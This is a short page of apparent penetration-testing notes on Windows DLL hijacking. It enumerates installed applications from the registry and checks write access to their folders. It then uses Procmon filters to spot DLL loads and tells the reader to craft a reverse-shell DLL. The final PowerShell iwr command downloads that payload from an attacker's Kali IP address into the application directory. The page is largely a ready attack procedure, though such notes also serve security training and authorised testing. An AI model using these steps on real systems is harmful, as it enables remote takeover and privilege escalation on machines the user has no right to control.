DLL Hijacking

1

Get all installed applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
2

Research

Google search each application to see if its vulnerable to DLL hijacking

3

Check if can write in the application directory

echo "test" > '<Application File Path>\test.txt'
type '<Application File Path>\test.txt'
4

Open Procmon.exe

NOTE: Requires Administrative rights. Best way is to transport suspected application to a machine you have admin rights to view.

5

Apply filters

Apply the following filters

Column
Relation
Value
Action

Process Name

is

<Application Name>

Include

Operation

is

CreateFile

Include

Path

contains

<DLL File Name>

Include

6

Craft a payload that returns reverse shell

7

Download the payload into target machine

iwr -uri http://<Kali IP Address>/<DLL File Name>.dll -Outfile '<Application File Path>/<DLL File Name>.dll'
PreviousService Binary HijackingNextUnquoted Service Paths

Last updated